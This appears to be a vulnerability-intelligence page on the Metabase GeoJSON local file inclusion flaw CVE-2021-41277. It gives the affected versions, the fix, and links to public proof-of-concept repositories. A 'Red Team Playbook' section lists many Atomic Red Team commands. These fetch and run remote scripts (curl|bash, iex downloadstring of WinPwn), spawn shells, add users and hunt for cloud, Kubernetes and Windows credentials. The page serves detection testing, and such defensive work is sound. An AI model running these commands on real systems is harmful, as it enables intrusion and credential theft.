CVE-2021-41277
Overview
This vulnerability is a local file inclusion (LFI) and improper input validation flaw within Metabase's custom GeoJSON map feature. The root cause is the lack of validation on URLs supplied through the admin interface for adding custom maps, allowing untrusted input to be loaded directly. The affected component is the custom map loading mechanism accessible via the administration settings under 'maps'.
Vulnerability Description
Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
Impact
An attacker with administrative access to the Metabase instance can exploit this vulnerability to read arbitrary local files, including sensitive environment variables, by specifying crafted URLs in the custom map feature. No user interaction beyond admin privileges is required. This can lead to disclosure of confidential configuration data, credentials, and potentially facilitate further system compromise or lateral movement within the environment.
Solution
Metabase addressed this vulnerability in maintenance releases 0.40.5 and 1.40.5 and all subsequent versions. Administrators are advised to upgrade to these versions as detailed in the Metabase security advisory at https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr. As an interim mitigation, applying URL validation rules at the reverse proxy, load balancer, or web application firewall level to restrict or filter map URLs is recommended until the upgrade can be performed.
EPSS vs KEV Prediction — Evolution (30 days)
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Metabase | Metabase | 0.40.0 |
cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:-:*:*:*
|
|
|
Metabase | Metabase | 0.40.1 |
cpe:2.3:a:metabase:metabase:0.40.1:*:*:*:-:*:*:*
|
|
|
Metabase | Metabase | 0.40.2 |
cpe:2.3:a:metabase:metabase:0.40.2:*:*:*:-:*:*:*
|
|
|
Metabase | Metabase | 0.40.3 |
cpe:2.3:a:metabase:metabase:0.40.3:*:*:*:-:*:*:*
|
|
|
Metabase | Metabase | 0.40.4 |
cpe:2.3:a:metabase:metabase:0.40.4:*:*:*:-:*:*:*
|
|
|
Metabase | Metabase | 1.40.0 |
cpe:2.3:a:metabase:metabase:1.40.0:-:*:*:enterprise:*:*:*
|
|
|
Metabase | Metabase | 1.40.1 |
cpe:2.3:a:metabase:metabase:1.40.1:*:*:*:enterprise:*:*:*
|
|
|
Metabase | Metabase | 1.40.2 |
cpe:2.3:a:metabase:metabase:1.40.2:*:*:*:enterprise:*:*:*
|
|
|
Metabase | Metabase | 1.40.3 |
cpe:2.3:a:metabase:metabase:1.40.3:*:*:*:enterprise:*:*:*
|
|
|
Metabase | Metabase | 1.40.4 |
cpe:2.3:a:metabase:metabase:1.40.4:*:*:*:enterprise:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (12)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
tahtaciburak/CVE-2021-41277
PoC for CVE-2021-41277
|
tahtaciburak | 11 | 7 | 2021-11-21 | View |
|
zer0yu/CVE-2021-41277
|
zer0yu | 9 | 4 | 2021-12-06 | View |
|
z3n70/CVE-2021-41277
simple program for exploit metabase
|
z3n70 | 5 | 1 | 2021-11-22 | View |
|
Vulnmachines/Metabase_CVE-2021-41277
|
Vulnmachines | 4 | 1 | 2021-11-23 | View |
|
sasukeourad/CVE-2021-41277_SSRF
CVE-2021-41277 can be extended to an SSRF
|
sasukeourad | 4 | 0 | 2022-01-10 | View |
|
chengling-ing/CVE-2021-41277
MetaBase 任意文件读取
|
chengling-ing | 1 | 0 | 2022-03-11 | View |
|
Henry4E36/Metabase-cve-2021-41277
Metabase 任意文件读取
|
Henry4E36 | 0 | 1 | 2021-11-22 | View |
|
RubXkuB/PoC-Metabase-CVE-2021-41277
|
RubXkuB | 1 | 0 | 2023-04-24 | View |
|
kaizensecurity/CVE-2021-41277
plugin made for LeakiX
|
kaizensecurity | 0 | 1 | 2021-11-23 | View |
|
grey-master-a/Metabase_Nmap_Script
It is a nmap script for metabase vulnerability (CVE-2021-41277)
|
grey-master-a | 0 | 0 | 2022-01-19 | View |
|
TheLastVvV/CVE-2021-41277
Metabase GeoJSON map local file inclusion
|
TheLastVvV | 0 | 0 | 2021-11-24 | View |
|
kap1ush0n/CVE-2021-41277
MetaBase 任意文件读取漏洞 fofa批量poc
|
kap1ush0n | 0 | 0 | 2021-11-22 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
59 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
for pid in $(pgrep -f 'Runner.Worker|Runner.Listener|runsvc|run.sh' 2>/dev/null); do tr '\0' '\n' < /proc/$pid/environ 2>/dev/null | grep -iE 'env|ssh'; done
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path} -maxdepth 6 -name "#{filename}" -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.aws/#{filename}' -type f 2>/dev/null
find #{file_path} -path '*/.azure/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.docker/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.config/gcloud/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /root -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find /etc/kubernetes -name '*.conf' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for filename in #{filenames}; do find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null; done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
for filename in #{filenames}; do
find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null
done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /etc/mysql -name 'my.cnf' -type f #{optional_flags} 2>/dev/null
find /etc/redis -name 'redis.conf' -type f #{optional_flags} 2>/dev/null
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-41277 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/metabase/metabase/commit/042a36e49574c749f944e19cf80360fd3dc322f0 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-41277 |